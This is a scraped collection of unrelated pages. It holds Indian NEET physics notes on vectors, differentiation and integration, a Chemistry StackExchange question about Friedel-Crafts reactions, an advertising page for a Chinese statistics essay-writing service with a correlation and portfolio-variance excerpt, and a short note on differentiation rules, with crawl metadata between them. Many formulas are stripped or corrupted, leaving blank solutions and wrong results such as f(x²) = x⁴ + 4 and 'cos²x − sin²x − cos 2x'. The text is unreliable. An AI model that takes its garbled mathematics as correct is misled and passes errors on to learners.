• The magnitude of vector product of two non-zero vectors will be minimum when |sinθ| = minimum = 0, i.e., θ = 0° or 180° and i.e., if the vector product of two non-zero vectors vanishes, the vectors are collinear.
• The self cross product i.e. product of a vector by itself vanishes i.e. is a null vector.
• In case of unit vector , ⇒
• In case of orthogonal unit vectors and in accordance with right-hand-thumb-rule,
• In terms of components.
Ex.22 is East wards and is downwards. Find the direction of × ?
Sol. Applying right hand thumb rule we find that is along North.
Ex.23 If , find angle between and
Sol. AB cosθ = AB sinθ tanθ = 1 ⇒ θ = 45°
Ex.24 ⇒ here is perpendicular to both and
Ex.25 Find if and
Sol. = =
Ex.26 (i) is North-East and is down wards, find the direction of
(ii) Find × if and
Ans. (i) North - West. (ii)
12. POSITION VECTOR :
Position vector for a point is vector for which tail is origin & head is the given point itself.
Position vector of a point defines the position of the point w.r.t. the origin.
13. DISPLACEMENT VECTOR :
Change in position vector of particle is known as displacement vector.
Thus we can represent a vector in space starting from (x , yj & ending at
CALCULUS
14. Constants : They are fixed real number which value does not change
Ex. 3, e, a, -1, etc.
15. Variable :
Something that is likely to vary, something that is subject to variation.
or
A quantity that can assume any of a set of value.
Types of variables.
(i) Independent variables : Independent variables is typically the variable being manipulated or changed
(ii) dependent variables : The dependent variables is the object result of the independent variable being manipulated.
Ex. y = x2
here y is dependent variable and x is independent variable
16. FUNCTION :
Function is a rule of relationship between two variables in which one is assumed to be dependent and the other independent variable.
The temperatures at which water boils depends on the elevation above sea level (the boiling point drops as you ascend). Here elevation above sea level is the independent & temperature is the dependent variable.
The interest paid on a cash investment depends on the length of time the investment is held. Here time is the independent and interest is the dependent variable.
In each case, the value of one variable quantity (dependent variable), which we might call y, depends on the value of another variable quantity (independent variable), which we might call x. Since the value of y is completely determined by the value of x, we say that y is a function of x and represent it mathematically as y = f(x).
all possible values of independent variables (x) are called domain of function.
all possible values of dependent variable (y) are called Range of function.
Think of function f as a kind machine that produces an output value f(x) in its range whenever we feed it an input value x from its domain (figure).
When we study circles, we usually call the area A and the radius r. Since area depends on radius, we say that A is a function of r, A = f(r). The equation A = πr2 is a rule that tells how to calculate a unique (single) output value of A for each possible input value of the radius r.
A = f(x) = πr2. (Here the rule of relationship which describes the function may be described as square & multiply by π)
if r = 1 A = π
if r = 2 A = 4π
if r = 3 A = 9π
The set of all possible input values for the radius is called the domain of the function. The set of all output values of the area is the range of the function.
We usually denote functions in one of the two ways :
1. By giving a formula such as y = x2 that uses a dependent variable y to denote the value of the function.
2. By giving a formula such as f(x) =x2 that defines a functions symbols f to name the function.
Strictly speaking, we should call the function f and not f(x).
y = sin x. Here the function is y since, x is the independent variable.
Ex.27 The volume V of ball (solid sphere) of radius r is given by the function V(r) =
The volume of a ball of radius 3m is?
Sol. V(3) = = 36 pm3.
Ex.28 Suppose that the function F is defined for all real numbers r by the formula.
F(r) = 2 (r -1) +3.
Evaluate F at the input values 0, 2 x 2, and F(2).
Sol. In each case we substitute the given input value for r into the formula for F:
F(0) = 2(0 -1) + 3 = -2 + 3 = 1
F(2) = 2(2 -1) + 3 = 2 + 3 =5
F(x + 2) = 2 (x + 2 -1) + 3 = 2x + 5
F(F(2)) = F(5) = 2(5 -1) 3 = 11
Ex. 29 function f(x) is defined as f(x) = x2 + 3, Find f(0), f(l), f(x>), f(x + 1) and f(f(l))
Sol. f(0) = 02 + 3 = 3
f(1) = l2 + 3 = 4
f(x2) = (x2)2 +3 = x4 + 4
f(x +1) = (x + 1)2 + 3 = x2 + 2x + 4
= f(4) = 42+3 = 19
17. Differentiation
Finite difference :
The finite difference between two values of a physical is represented by Δ notation.
For example :
Difference in two values of y is written as Δy as given in the table below.
y2 100 100 100 y1 50 99 99.5 Δy = y2 - y1 50 1 0.5
Infinitely small difference :
The infinitely small difference means very-very small difference. And this difference is represented by 'd' notation instead of 'D'.
For example infinitely small difference in the values of y is written as 'dy'
if y2 = 100 and y1 = 99.9999999999999.....
then dy = 0.00000000000000..........00001
Definition of differentiation
Another name of differentiation is derivative. Suppose y is a function of x or y = f(x)
Differentiation of y with respect to x is denoted by symbols f' (x)
where f'(x) = ; dx is very small change in x and dy is corresponding very small change in y.
Notation : There are many ways to denote the derivative of function y = f(x), the most common notations are these :
y "y prime" Nice and brief and does not name the independent variable dy/dx " dy by dx" Names the variables and uses d for derisive df/dx " df by dx" Emphasizes the function's name ” d by dx of f" Emphasizes the idea that differentiation is an operation performed on f. Dxf " dx of f" A common operator notation ” y dot" One of Newton's notations, now common for time derivative i.e. dy/dt
Average rates of change :
Given an arbitrary function y = f(x) we calculate the average rate of change of y with respect to x over the interval (x, x +Δx) by dividing the change in value of y, i.e., Dy = f(x+Δx) -f(x), by length of interval Δx over which the change occurred.
The average rate of change of y with respect to x over the interval [x, x+Δx]
Geometrically
= tanθ = Slope of the line PQ
In triangle QPR tanθ =
therefore we can say that average rate of change of y with respect to x is equal to slope of the line joining P & Q.
The derivative of a function
We know that Average rate of change of y w.r.t x is -
If the limit of this ratio exists as Δx → 0, then it is called the derivative of given function f(x) and is denoted as
18. GEOMETRICAL MEANING OF DIFFERENTIATION :
The geometrical meaning of differentiation is very much useful in the analysis of graphs in physics. To understand the geometrical meaning of derivatives we should have knowledge of secant and tangent to a curve.
Secant and Tangent to a Curve
Secant : - A secant to a curve is a straight line, which intersects the curve at any two points.
Tangent :
A tangent is a straight line, which touches the curve a particular point. Tangent is limiting case of secant which intersects the curve at two overlapping points.
In the figure - 1 shown, if value of Δx has gradually reduced then the point Q will move nearer to the point P. If the process is continuously repeated (Figure-2) value of Δx will be infinitely small and secant PQ to the given curve will become a tangent at point P.
Therefore
we can say that differentiation of y with respect to x, i.e. is equal to slope of the tangent at point P (x,y)
or tanθ =
(From fig-1 the average rate change of y from x to x+Δx is identical with the slope of secant PQ)
Rule No. 1 Derivative Of A Constant
The first rule of differentiation is that the derivative of every constant function is zero.
If c is constant, then
Ex.30, ,
Rule No.2 Power Rule
If n is a real number, then
To apply the power Rule, we subtract 1 from the original exponent (n) and multiply the result by n.
Ex.31
Function defined for x > 0 derivative defined only for x > 0
Function defined for x > 0 derivative not defined at x = 0
Rule No.3 The Constant Multiple Rule
If u is a differentiable function of x, and c is a constant, then
In particular, if n is a positive integer, then
Ex.34 The derivative formula
says that if we rescale the graph of y = x2 by multiplying each y-coordinate by 3, then we multiply the slope at each point by 3.
Ex.35 A useful special case
The derivative of the negative of a differentiable function is the negative of the function's derivative. Rule 3 with c = -1 gives.
Rule No.4 The Sum Rule
The derivative of the sum of two differentiable functions is the sum of their derivatives.
If u and v are differentiable functions of x, then their sum u+v is differentiable at every point where u and v are both differentiable functions in their derivatives.
The sum Rule also extends to sums of more than two functions, as long as there are only finite functions in the sum. If u1, u2, ........ un is differentiable at x, then so if u1+u2 ....... +un, then
Notice that we can differentiate any polynomial term by term, the way we differentiated the polynomials in above example.
Rule No. 5 The Product Rule
If u and v are differentiable at x, then if their product uv is considered, then .
The derivative of the product uv is u times the derivative of v plus v times the derivative of u. In prime notation
(uv)' = uv' + vu'.
While the derivative of the sum of two functions is the sum of their derivatives, the derivative of the product of two functions is not the product of their derivatives. For instance,
while , which is wrong
Ex.37 Find the derivatives of y = (x2+1) (x3+3)
Sol. Using the product Rule with u = x2+1 and v = x3+3, we find
= (x2+1) (3x2) + (x3+3) (2x)
= 3x4 + 3x2 + 2x4 + 6x = 5x4 + 3x2 + 6x
Example can be done as well (perhaps better) by multiplying out the original expression for y and differentiating the resulting polynomial. We now check :
y = (x2 + 1) (x3 + 3) = x5 + x3 + 3x2 + 3
= 5x4 + 3x2 + 6x
This is in agreement with our first calculation.
There are times, however, when the product Rule must be used. In the following examples. We have only numerical values to work with.
Ex.38 Let y = uv be the product of the functions u and v. Find y'(2) if u(2) = 3, u'(2) = -4, v(2) = 1, and v'(2) = 2.
Sol.
From the Product Rule, in the form y' = (uv)' = uv' + vu',
we have y'(2) = u(2) v'(2) + v(2) u'(2)
= (3) (2) + (1) (-4) = 6-4 = 2
Rule No.6 The Quotient Rule
If u and v are differentiable at x, and v(x) ¹ 0, then the quotient u/v is differentiable at x,
and
Just as the derivative of the product of two differentiable functions is not the product of their derivatives, the derivative of the quotient of two functions is not the quotient of their derivatives.
Ex.39 Find the derivative of
Sol. We apply the Quotient Rule with u = t2 -1 and v = t2 1
Rule No. 7 Derivative Of Sine Function
Ex.40
Rules No.8 Derivative Of Cosine Function
Ex.41 (a) y = 5x + cos x Sum Rule
Product Rule
= sin x(— sin x) + cos x (cos x)
= cos2 x - sin2 x - cos 2x
Rule No. 9 Derivatives Of Other Trigonometric Functions
Because sin x and cos x are differentiable functions of x, the related functions
;
;
are differentiable at every value of x at which they are defined. There derivatives, Calculated from the Quotient Rule, are given by the following formulas.
;
;
Ex.42 Find dy / dx if y = tan x.
Sol.
Ex. 43
Rule No. 10 Derivative Of Logarithm And Exponential Functions
,
Ex.44 y = ex . loge (x)
⇒
Rule No. 11 Chain Rule Or `Outside Inside' Rule
It sometimes helps to think about the Chain Rule the following way. If y = f(g(x)),
= f'[g(x)] . g'(x)
In words : To find dy/dx, differentiate the "outside" function f and leave the "inside" g(x) alone; then multiply by the derivative of the inside.
We now know how to differentiate sin x and x2 -4, but how do we differentiate a composite like sin(x2 -4)?
The answer is, with the Chain Rule, which says that the derivative of the composite of two differentiable functions is the product of their derivatives evaluated at appropriate points. The Chain Rule is probably the most widely used differentiation rule in mathematics. This section describes the rule and how to use it. We begin with examples.
Ex.45 The function y = 6x -10 = 2(3x -5) is the composite of the functions y = 2u and u = 3x -5. How are the derivatives of these three functions related ?
Sol. We have , ,
Since 6 = 2 × 3
Is it an accident that ?
If we think of the derivative as a rate of change, our intuitions allows us to see that this relationship is reasonable. For y = f(u) and u = g(x), if y changes twice as fast as u and u changes three times as fast as x, then we expect y to change six times as fast as x.
Ex.46 Let us try this again on another function.
y = 9x4 +6x2 +1 = (3x2 +1)2
is the composite y = u2 and u = 3x2 + 1. Calculating derivatives. We see that
= 2 (3x2 + 1). 6x = 36x3 + 12 x
and = 36 x3 + 12 x
Once again,
The derivative of the composite function f(g(x)) at x is the derivative of f at g(x) times the derivative of g at x.
Ex.47 Find the derivation of
Sol. Here y = f(g(x)), where f(u) = and u = g(x) = x2 + 1. Since the derivatives of f and g are
f' (u) = and g'(x) = 2x,
the Chain Rule gives
= f' (g(x)).g'(x) = .g'(x) = . (2x) =
Ex.48
Ex. 49 u = 1 - x2 and n = 1/4
(Function defined) on [-1, 1]
Rule No. 12 Power Chain Rule
If
Ex.50 = = -1 (3x -2)-2
= -1 (3x -2)-2 (3) = -
In part (d) we could also have found the derivation with the Quotient Rule.
Ex.51 (a)
Sol. Here u = Ax B,
(b)
(c)log(Ax B) = .A
(d)tan (Ax + B) = sec2 (Ax + B).A
(e)
Note : These results are important
19. DOUBLE DIFFERENTIATION
If f is differentiable function, then its derivative f' is also a function, so f' may have a derivative of its own, denoted by . This new function f'' is called the second derivative of because it is the derivative of the derivative of f. Using Leibniz notation, we write the second derivative of y = f(x) as
Another notation is f''(x) = D2 f(x).
Ex.52 If(x) = x cos x, find f'' (x)
Sol. Using the Product Rule, we have f'(x)
To find f" (x) we differentiate f'(x)
= - x cos x - sinx - sinx = - x cos x - 2 sin x
20. Application of derivative Differentiation as a rate of change
is rate of change of 'y' with respect to 'x' :
For examples :
(i) v = this means velocity 'v' is rate of change of displacement 'x' with respect to time 't'
(ii) a = this means acceleration 'a' is rate of change of velocity 'v' with respect to time 't'.
(iii) this means force 'F' is rate of change of momentum 'p' with respect to time 't'.
(iv) = this means torque 't' is rate of change of angular momentum 'L' with respect to time 't'
(v) Power = this means power 'P' is rate of change of work 'W' with respect to time 't'
Ex.53 The area A of a circle is related to its diameter by the equation .
How fast is the area changing with respect to the diameter when the diameter is 10 m ?
Sol. The (instantaneous) rate of change of the area with respect to the diameter is
When D =10m, the area is changing at rate (π/2) = 5π m2/m. This means that a small change ΔD m in the diameter would result in a change of about 5p ΔD m2 in the area of the circle.
Physical Example :
Ex.54 Boyle's Law states that when a sample of gas is compressed at a constant temperature, the product of the pressure and the volume remains constant : PV = C. Find the rate of change of volume with respect to pressure.
Sol.
Ex.55 (a) Find the average rate of change of the area of a circle with respect to its radius r as r changed from
(i) 2 to 3 (ii) 2 to 2.5 (iii) 2 to 2.1
(b) Find the instantaneous rate of change when r = 2.
(c) Show that there rate of change of the area of a circle with respect to its radius (at any r) is equal to the circumference of the circle. Try to explain geometrically when this is true by drawing a circle whose radius is increased by an amount Δr. How can you approximate the resulting change in area ΔA if Δr is small ?
Sol. (a) (i) 5π (ii) 4.5 π (iii) 4.1 π
(b) 4π
(c) ΔA ≈ 2 πrΔr
21. MAXIMA & MINIMA
Suppose a quantity y depends on another quantity x in a manner shown in figure. It becomes maximum at x1 and minimum at x2. At these points the tangent to the curve is parallel to the x-axis and hence its slope is tanθ = 0. Thus, at a maximum or a minima slope
Maxima
Just before the maximum the slope is positive, at the maximum it is zero and just after the maximum it is negative. Thus, decrease at a maximum and hence the rate of change of is negative at a maximum i.e., at maximum. The quantity is the rate of change of the slope. It is written as . Conditions for maxima are : (a) (b)
Minima
Similarly, at a minimum the slope changes from negative to positive, Hence with the increases of x. The slope is increasing that means the rate of change of slope with respect to x is positive.
Hence
Conditions for minima are :
(a) (b)
Quite often it is known from the physical situation whether the quantity is a maximum or a minimum. The test on may then be omitted.
Ex.56 Find maximum or minimum values of the functions :
(A) y = 25x2 + 5 -10x (B) y = 9 -(x -3)2
Sol. (A) For maximum and minimum value, we can put
or x =
Further,
or has positive value at x = . Therefore, y has minimum value at x = . Therefore, y has minimum value at x = . Substituting x = in given equation, we get
ymin =
(B) y = 9 -(x -3)2 = 9 -x2 +-9 6x
or y = 6x -x2
For minimum or maximum value of y we will substitute
or 6 -2x = 0
x = 3
To check whether value of y is maximum or minimum at x = 3 we will have to check whether is positive or negative.
or is negative at x = 3. Hence, value of y is maximum. This maximum value of y is,
ymax = 9 -(3 -3)2 = 9
22. INTEGRATION
Definitions :
A function F(x) is a antiderivative of a function f(x) if
F'(x) = f(x)
for all x in the domain of f. The set of all antiderivatives of f is the indefinite integral of f with respect to x, denoted by
The symbol is an integral sign. The function f is the integrand of the integral and x is the variable of integration.
For example f(x) = x3 then f'(x) = 3x2
So the integral of 3x2 is x3
Similarly if f(x) = x3 + 4
there for the general integral of 3x2 is x3 + c where c is a constant
One antiderivative F of a function f, the other antiderivatives of f differ from F by a constant. We indicate this in integral notation in the following way :
.....(i)
The constant C is the constant of integration or arbitrary constant, Equation (1) is read, "The indefinite integral of f with respect to x is F(x) + C." When we find F(x) + C, we say that we have integrated f and evaluated the integral.
Ex.57 Evaluate
Sol.
The formula x2 + C generates all the antiderivatives of the function 2x. The function x2+ 1, x2 -π, and
x2+ are all antiderivatives of the function 2x, as you can check by differentiation.
Many of the indefinite integrals needed in scientific work are found by reversing derivative formulas.
Integral Formulas
Indefinite Integral Reversed derivated formula 1. ,n ¹ -1, n rational (special case) = xn 2. 3. 4. 5. (-cot x) = cosec2 x 6. = sec x tan x 7. = -cosec x +C (-cosec x) = cosec x cot x
Ex.58 Examples based on above formulas :
(a)
(b) Formula 1 with n = 5
(c) Formula 1 with n =
(d) Formula 2 with k = 2
(e) = = Formula 3 with k =
Ex.59 Right : = x sin x + cos x C
Reason : The derivative of the right-hand side is the integrand :
Check : = x cos x + sin x -sin x + 0 = x cos x.
Wrong : = x sin x +C
Reason : The derivative of the right-hand side is not the integrand :
Check : = x cos x + sin x + 0 x cos x
Rule No. 1 Constant Multiple Rule
• A function is an anti derivative of a constant multiple k of a function f if and only if it is k times an antiderivative of f.
Ex.60 = =
Rule No.2 Sum And Difference Rule
• A function is an anti derivative of a sum or difference f ± g if and only if it is the sum or difference of an anti derivative of f an anti derivative of g.
Ex.61 Term-by-term integration
Evaluate :
Sol. If we recognize that (x3/3) -x2 +5x is an anti derivative of x2 -2x +5, we can evaluate the integral as
If we do not recognize the anti derivative right away, we can generate it term by term with the sum and difference Rule :
This formula is more complicated than it needs to be. If we combine C1, C2 and C3 into a single constant
C = C1 + C2 + C3, the formula simplifies to
and still gives all the anti derivatives there are. For this reason we recommend that you go right to the final form even if you elect to integrate term by term. Write
Find the simplest anti derivative you can for each part add the constant at the end.
Ex.62 We can sometimes use trigonometric identities to transform integrals we do not know how to evaluate into integrals. The integral formulas for sin2 x and cos2 x arise frequently in applications.
(a) =
=
(b) =
As in part (a), but with a sign change
23. Some Indefinite integrals (An arbitrary constant should be added to each of these integrals.
(a) (provided n ¹ --1) C
(b)
(c)
(d)
(e)
(f)
Ex.63 (a)
(b)
(c)
(d)
(e)
(f)
(g)
(h)
24. DEFINITE INTEGRATION OR INTEGRATION WITH LIMITS
Ex.64 = 3 [4 -(-1)] = (3) (5) = 15
= + cos (0) = -0 + 1 = 1
Ex.65 (1)
(2)
(3)
25. APPLICATION OF DEFINITE INTEGRAL
Calculation Of Area Of A Curve.
From graph shown in figure if we divide whole area in infinitely small strips of dx width.
We take a strip at x position of dx width.
Small area of this strip dA = f(x) dx
So, the total area between the curve and x-axis = sum of area of all strips =
Let f(x) > 0 be continuous on [a,b]. The area of the region between the graph of f and the x-axis is
Ex.66 Using an area to evaluate a definite integral
Evaluate 0 < a < b.
Sol. We sketch the region under the curve y = x, a £ x £ b (figure) and see that it is a trapezoid with height (b -a) and bases a and b.
The value of the integral is the area of this trapezoid :
Thus =
and so on.
Notice that x2/2 is an antiderivative of x, further evidence of a connection between antiderivatives and summation.
(i) To find impulse
so implies =
Ex.67 If F = kt then find impulse at t = 3 sec.
so impulse will be area under f - t curve
=
2. To calculate work done by force :
So area under f - x curve will give the value of work done.
The document Resolution of Vectors: Motion in a Plane - Notes | Study Physics Class 11 - NEET is a part of the NEET Course Physics Class 11.
All you need of NEET at this link: NEET
## Physics Class 11
127 videos|464 docs|210 tests
Use Code STAYHOME200 and get INR 200 additional OFF
## Physics Class 11
127 videos|464 docs|210 tests
### How to Prepare for NEET
Read our guide to prepare for NEET which is created by Toppers & the best Teachers
Track your progress, build streaks, highlight & save important lessons and more!
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
; | 2023-01-29 13:50:50 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8995983600616455, "perplexity": 1194.9239071530508}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764499713.50/warc/CC-MAIN-20230129112153-20230129142153-00420.warc.gz"} |
https://chemistry.stackexchange.com/questions/107984/friedel-craft-reaction-with-amide-substituent | # Friedel-Craft reaction with amide substituent
In this question, I know that aniline will not undergo FC reaction as it forms a complex with $$\ce {AlCl3}$$ and precipitates out. The answer given is (c) and I agree with it. However, the benzene ring with the amide substituent in (d) will be deactivated as the amide substituent will put a positive charge into resonance. So, will it give FC reaction? Should the answer be both c and d?
• I read that -NHCOCH3 is ortho para direction. By making the resonance structure, option d is meta directing. I am confused. – Gautam Jan 15 at 4:13
• – Tan Yong Boon Jan 15 at 10:15
• AlCl3 reacting with an amide may be difficult compared to amine since lonepair in an amide is in conjugation with carbonyl type group as well as benzene.So FC reaction of benzamide maybe possible – Chakravarthy Kalyan Jan 15 at 16:38 | 2019-09-23 05:06:33 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 1, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5209768414497375, "perplexity": 5021.460816189352}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514576047.85/warc/CC-MAIN-20190923043830-20190923065830-00516.warc.gz"} |
https://www.statistics-lab.com/%E7%BB%9F%E8%AE%A1%E4%BB%A3%E5%86%99%E9%87%91%E8%9E%8D%E7%BB%9F%E8%AE%A1%E4%BB%A3%E5%86%99mathematics-with-statistics-for-finance%E4%BB%A3%E8%80%83correlation/ | ### 统计代写|金融统计代写Mathematics with Statistics for Finance代考|CORRELATION
statistics-lab™ 为您的留学生涯保驾护航 在代写金融统计Mathematics with Statistics for Finance G1GH方面已经树立了自己的口碑, 保证靠谱, 高质且原创的统计Statistics代写服务。我们的专家在代写金融统计Mathematics with Statistics for Finance G1GH方面经验极为丰富,各种代写金融统计Mathematics with Statistics for Finance G1GH相关的作业也就用不着说。
• Statistical Inference 统计推断
• Statistical Computing 统计计算
• (Generalized) Linear Models 广义线性模型
• Statistical Machine Learning 统计机器学习
• Longitudinal Data Analysis 纵向数据分析
• Foundations of Data Science 数据科学基础
## 统计代写|金融统计代写Mathematics with Statistics for Finance代考|CORRELATION
Closely related to the concept of covariance is correlation. To get the correlation of two variables, we simply divide their covariance by their respective standard deviations:
$$\rho_{X Y}=\frac{\sigma_{X Y}}{\sigma_{X} \sigma_{Y}}$$
Correlation has the nice property that it varies between $-1$ and $+1$. If two variables have a correlation of $+1$, then we say they are perfectly correlated. If the ratio of one variable to another is always the same and positive then the two variables will be perfectly correlated.
If two variables are highly correlated, it is often the case that one variable causes the other variable, or that both variables share a common underlying driver. We will see in later chapters, though, that it is very easy for two random variables with no causal link to be highly correlated. Correlation does not prove causation. Similarly, if two variables are uncorrelated, it does not necessarily follow that they are unrelated. For example, a random variable that is symmetrical around zero and the square of that variable will have zero correlation.
## 统计代写|金融统计代写Mathematics with Statistics for Finance代考|PORTFOLIO VARIANCE AND HEDGING
If we have a portfolio of securities and we wish to determine the variance of that portfolio, all we need to know is the variance of the underlying securities and their respective correlations.
For example, if we have two securities with random returns $X_{A}$ and $X_{B}$, with means $\mu_{A}$ and $\mu_{B}$ and standard deviations $\sigma_{A}$ and $\sigma_{B}$, respectively, we can calculate the variance of $X_{A}$ plus $X_{B}$ as follows:
$$\sigma_{A+B}^{2}=\sigma_{A}^{2}+\sigma_{B}^{2}+2 \rho_{A B} \sigma_{A} \sigma_{B}$$
where $\rho_{A B}$ is the correlation between $X_{A}$ and $X_{B}$. The proof is left as an exercise. Notice that the last term can either increase or decrease the total variance. Both standard deviations must be positive; therefore, if the correlation is positive, the overall variance will be higher compared to the case where the correlation is negative.
If the variance of both securities is equal, then Equation $3.29$ simplifies to:
$$\sigma_{A+B}^{2}=2 \sigma^{2}\left(1+\rho_{A B}\right) \text { where } \sigma_{A}^{2}=\sigma_{B}^{2}=\sigma^{2}$$
Now we know that the correlation can vary between $-1$ and $+1$, so, substituting into our new equation, the portfolio variance must be bound by 0 and $4 \sigma^{2}$. If we take the square root of both sides of the equation, we see that the standard deviation is bound by 0 and $2 \sigma$. Intuitively this should make
sense. If, on the one hand, we own one share of an equity with a standard deviation of $\$ 10$and then purchase another share of the same equity, then the standard deviation of our two-share portfolio must be$\$20$ (trivially, the correlation of a random variable with itself must be one). On the other hand, if we own one share of this equity and then purchase another security that always generates the exact opposite return, the portfolio is perfectly balanced. The returns are always zero, which implies a standard deviation of zero.
In the special case where the correlation between the two securities is zero, we can further simplify our equation. For the standard deviation:
$$\rho_{A B}=0 \Rightarrow \sigma_{A+B}=\sqrt{2} \sigma$$
We can extend Equation $3.29$ to any number of variables:
\begin{aligned} Y &=\sum_{i=1}^{n} X_{i} \ \sigma_{Y}^{2} &=\sum_{i=1}^{n} \sum_{j=1}^{n} \rho_{i j} \sigma_{i} \sigma_{j} \end{aligned}
In the case where all of the $X_{i}$ ‘s are uncorrelated and all the variances are equal to $\sigma$, Equation $3.32$ simplifies to:
$$\sigma_{Y}=\sqrt{n} \sigma \quad \text { iff } \rho_{i j}=0 \forall i \neq j$$
## 统计代写|金融统计代写Mathematics with Statistics for Finance代考|MOMENTS
Previously, we defined the mean of a variable $X$ as:
$$\mu=E[X]$$
It turns out that we can generalize this concept as follows:
$$m_{k}=E\left[X^{k}\right]$$
We refer to $m_{k}$ as the $k$ th moment of $X$. The mean of $X$ is also the first moment of $X$.
Similarly, we can generalize the concept of variance as follows:
$$\mu_{k}=E\left[(X-\mu)^{k}\right]$$
We refer to $\mu_{k}$ as the $k$ th central moment of $X$. We say that the moment is central because it is central around the mean. Variance is simply the second central moment.
While we can easily calculate any central moment, in risk management it is very rare that we are interested in anything beyond the fourth central moment.
ρX是=σX是σXσ是
## 统计代写|金融统计代写Mathematics with Statistics for Finance代考|PORTFOLIO VARIANCE AND HEDGING
σ一种+乙2=σ一种2+σ乙2+2ρ一种乙σ一种σ乙
σ一种+乙2=2σ2(1+ρ一种乙) 在哪里 σ一种2=σ乙2=σ2
ρ一种乙=0⇒σ一种+乙=2σ
σ是=nσ 当且当 ρ一世j=0∀一世≠j
μ=和[X]
μķ=和[(X−μ)ķ]
## 广义线性模型代考
statistics-lab作为专业的留学生服务机构,多年来已为美国、英国、加拿大、澳洲等留学热门地的学生提供专业的学术服务,包括但不限于Essay代写,Assignment代写,Dissertation代写,Report代写,小组作业代写,Proposal代写,Paper代写,Presentation代写,计算机作业代写,论文修改和润色,网课代做,exam代考等等。写作范围涵盖高中,本科,研究生等海外留学全阶段,辐射金融,经济学,会计学,审计学,管理学等全球99%专业科目。写作团队既有专业英语母语作者,也有海外名校硕博留学生,每位写作老师都拥有过硬的语言能力,专业的学科背景和学术写作经验。我们承诺100%原创,100%专业,100%准时,100%满意。
## MATLAB代写
MATLAB 是一种用于技术计算的高性能语言。它将计算、可视化和编程集成在一个易于使用的环境中,其中问题和解决方案以熟悉的数学符号表示。典型用途包括:数学和计算算法开发建模、仿真和原型制作数据分析、探索和可视化科学和工程图形应用程序开发,包括图形用户界面构建MATLAB 是一个交互式系统,其基本数据元素是一个不需要维度的数组。这使您可以解决许多技术计算问题,尤其是那些具有矩阵和向量公式的问题,而只需用 C 或 Fortran 等标量非交互式语言编写程序所需的时间的一小部分。MATLAB 名称代表矩阵实验室。MATLAB 最初的编写目的是提供对由 LINPACK 和 EISPACK 项目开发的矩阵软件的轻松访问,这两个项目共同代表了矩阵计算软件的最新技术。MATLAB 经过多年的发展,得到了许多用户的投入。在大学环境中,它是数学、工程和科学入门和高级课程的标准教学工具。在工业领域,MATLAB 是高效研究、开发和分析的首选工具。MATLAB 具有一系列称为工具箱的特定于应用程序的解决方案。对于大多数 MATLAB 用户来说非常重要,工具箱允许您学习应用专业技术。工具箱是 MATLAB 函数(M 文件)的综合集合,可扩展 MATLAB 环境以解决特定类别的问题。可用工具箱的领域包括信号处理、控制系统、神经网络、模糊逻辑、小波、仿真等。 | 2023-03-24 12:54:15 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9147166609764099, "perplexity": 503.69490069598777}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945282.33/warc/CC-MAIN-20230324113500-20230324143500-00772.warc.gz"} |
https://astarmathsandphysics.com/igcse-maths-notes/470-differentiation-product-quotient-chain-rules.html | ## Differentiation - Product, Quotient, Chain Rules
The three rules are given bythe formulae
Product Rule
Quotient Rule
Chain Rule
For each of these rules you can complete the table
u v u' v'
Then sub into the formula
Examples
Differentiate
u v u' 1 v'
Differentiate
u v x u' v' 1
Differentiate
u v u' $cos v$ v'
